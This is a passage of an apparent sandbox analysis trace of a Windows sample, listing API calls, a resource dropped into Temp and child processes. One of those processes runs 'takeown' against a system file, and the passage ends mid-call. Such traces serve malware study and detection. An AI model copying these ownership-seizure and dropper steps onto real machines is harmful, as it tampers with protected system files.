[0232.523] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0232.524] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0232.524] GetLastError () returned 0x0 [0232.524] SetLastError (dwErrCode=0x0) [0232.524] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0232.524] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0232.524] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0232.524] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0232.524] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ6\x01\x87wäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0232.524] GetLastError () returned 0x0 [0232.524] SetLastError (dwErrCode=0x0) [0232.524] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0232.524] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0232.524] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0232.524] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0232.524] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ6\x01\x87wäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0232.524] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x80) returned 0x8f8250 [0232.524] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0232.524] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0232.525] RtlSizeHeap (HeapHandle=0x8e0000, Flags=0x0, MemoryPointer=0x8f8250) returned 0x80 [0232.525] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0232.525] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0232.525] GetCurrentProcess () returned 0xffffffff [0232.525] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0232.525] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0232.525] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0232.525] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0232.525] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0232.525] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0232.525] LockResource (hResData=0x43c648) returned 0x43c648 [0232.525] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x0, Size=0x18) returned 0x8f82d8 [0232.525] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0232.526] GetLastError () returned 0x20 [0232.526] GetLastError () returned 0x20 [0232.526] SetLastError (dwErrCode=0x20) [0232.526] GetLastError () returned 0x20 [0232.526] SetLastError (dwErrCode=0x20) [0232.526] GetLastError () returned 0x20 [0232.526] SetLastError (dwErrCode=0x20) [0232.526] GetLastError () returned 0x20 [0232.526] SetLastError (dwErrCode=0x20) [0232.526] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x0, Size=0x1000) returned 0x8f9828 [0232.526] GetLastError () returned 0x20 [0232.527] SetLastError (dwErrCode=0x20) [0232.527] GetLastError () returned 0x20 [0232.527] SetLastError (dwErrCode=0x20) [0232.527] GetLastError () returned 0x20 [0232.527] SetLastError (dwErrCode=0x20) [0232.527] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e38c | out: lpMode=0x18e38c) returned 1 [0232.527] WriteFile (in: hFile=0x7, lpBuffer=0x18ea68*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x18e394, lpOverlapped=0x0 | out: lpBuffer=0x18ea68*, lpNumberOfBytesWritten=0x18e394*=0x49, lpOverlapped=0x0) returned 1 [0232.934] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8f7820 | out: hHeap=0x8e0000) returned 1 [0232.934] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0232.934] ExitProcess (uExitCode=0x1) [0232.934] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8f60d0 | out: hHeap=0x8e0000) returned 1 Process: id = "243" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0x1bd16000" os_pid = "0xa28" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "210" os_parent_pid = "0xab8" cmd_line = "takeown /F \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 842 os_tid = 0x5d0 Thread: id = 848 os_tid = 0xa18 Process: id = "244" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x2a38e000" os_pid = "0xb54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "240" os_parent_pid = "0xb14" cmd_line = "tdq963ii.exe -accepteula \"mxslipstream.exe\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 843 os_tid = 0x6a0 [0233.061] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0233.062] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0233.062] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0233.062] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0233.062] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0233.062] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0233.062] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0233.063] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0233.063] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0233.063] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0233.063] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0233.063] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0233.063] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0233.063] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0233.063] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0233.063] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0233.063] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0233.063] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0233.064] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0233.064] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0233.064] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0233.064] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0233.064] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0233.064] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0233.064] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0233.064] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0233.064] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0233.064] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0233.064] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0233.064] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0233.064] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0233.065] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0233.065] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0233.065] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0233.065] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0233.065] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0233.065] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0233.065] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0233.065] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0233.065] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0233.065] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0233.065] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0233.065] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0233.065] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0233.066] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0233.066] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0233.066] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0233.066] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0233.066] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0233.066] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0233.066] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0233.066] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0233.066] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0233.066] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0233.066] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0233.066] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0233.066] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0233.067] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0233.067] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0233.067] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0233.067] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0233.067] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0233.067] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0233.067] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0233.067] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0233.067] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0233.067] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0233.067] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0233.068] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0233.068] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0233.068] GetProcAddress 